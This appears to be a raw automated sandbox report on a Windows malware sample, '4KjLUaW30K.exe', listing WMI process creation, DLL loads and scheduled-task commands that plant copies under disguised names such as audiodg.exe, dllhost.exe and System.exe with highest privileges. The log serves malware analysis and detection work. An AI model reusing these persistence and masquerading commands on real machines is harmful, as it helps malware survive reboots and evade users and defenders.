Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\Desktop\4KjLUaW30K.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: 4KjLUaW30K.exe ReversingLabs: Detection: 83%
Source: 4KjLUaW30K.exe Virustotal: Detection: 68%
Source: C:\Users\user\Desktop\4KjLUaW30K.exe File read: C:\Users\user\Desktop\4KjLUaW30K.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\4KjLUaW30K.exe "C:\Users\user\Desktop\4KjLUaW30K.exe"
Source: unknown Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\Recovery\System.exe'" /f
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Recovery\System.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Recovery\System.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\audiodg.exe'" /f
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\audiodg.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\audiodg.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mnUYCZffXdEgQlZPiczLektp" /sc ONLOGON /tr "'C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mnUYCZffXdEgQlZPiczLektpm" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Downloads\ShellExperienceHost.exe'" /f
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Users\Public\Downloads\ShellExperienceHost.exe'" /rl HIGHEST /f
Source: unknown Process created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe "C:\Program Files (x86)\mozilla maintenance service\logs\audiodg.exe"
Source: unknown Process created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe "C:\Program Files (x86)\mozilla maintenance service\logs\audiodg.exe"
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mnUYCZffXdEgQlZPiczLektp" /sc ONLOGON /tr "'C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe'" /rl HIGHEST /f
Source: unknown Process created: C:\Program Files (x86)\Windows Defender\dllhost.exe "C:\Program Files (x86)\windows defender\dllhost.exe"
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "mnUYCZffXdEgQlZPiczLektpm" /sc MINUTE /mo 6 /tr "'C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe'" /rl HIGHEST /f
Source: unknown Process created: C:\Program Files (x86)\Windows Defender\dllhost.exe "C:\Program Files (x86)\windows defender\dllhost.exe"
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process created: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe "C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe"
Source: unknown Process created: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe
Source: unknown Process created: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe
Source: unknown Process created: C:\Users\Public\Downloads\ShellExperienceHost.exe C:\Users\Public\Downloads\ShellExperienceHost.exe
Source: unknown Process created: C:\Users\Public\Downloads\ShellExperienceHost.exe C:\Users\Public\Downloads\ShellExperienceHost.exe
Source: unknown Process created: C:\Recovery\System.exe C:\Recovery\System.exe
Source: unknown Process created: C:\Recovery\System.exe C:\Recovery\System.exe
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\70189604-2a9a-4ba1-809b-491977885217.vbs"
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\28bf72c6-5a6e-449b-a0d6-76cd4ab5c11d.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe "C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe"
Source: unknown Process created: C:\Recovery\System.exe "C:\Recovery\System.exe"
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Process created: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe "C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe" Jump to behavior
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\70189604-2a9a-4ba1-809b-491977885217.vbs"
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\28bf72c6-5a6e-449b-a0d6-76cd4ab5c11d.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe "C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe"
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\dllhost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\dllhost.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\dllhost.exe Section loaded: thumbcache.dll Jump to behavior
Source: C:\Windows\System32\dllhost.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: version.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Section loaded: sspicli.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: mscoree.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: apphelp.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: kernel.appcore.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: version.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: uxtheme.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: windows.storage.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: wldp.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: profapi.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: cryptsp.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: rsaenh.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: cryptbase.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: sspicli.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: amsi.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: userenv.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: wbemcomn.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: iphlpapi.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: dnsapi.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: dhcpcsvc6.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: dhcpcsvc.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: winnsi.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: propsys.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: rasapi32.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: rasman.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: rtutils.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: edputil.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: urlmon.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: iertutil.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: srvcli.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: netutils.dll
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Section loaded: mswsock.dll
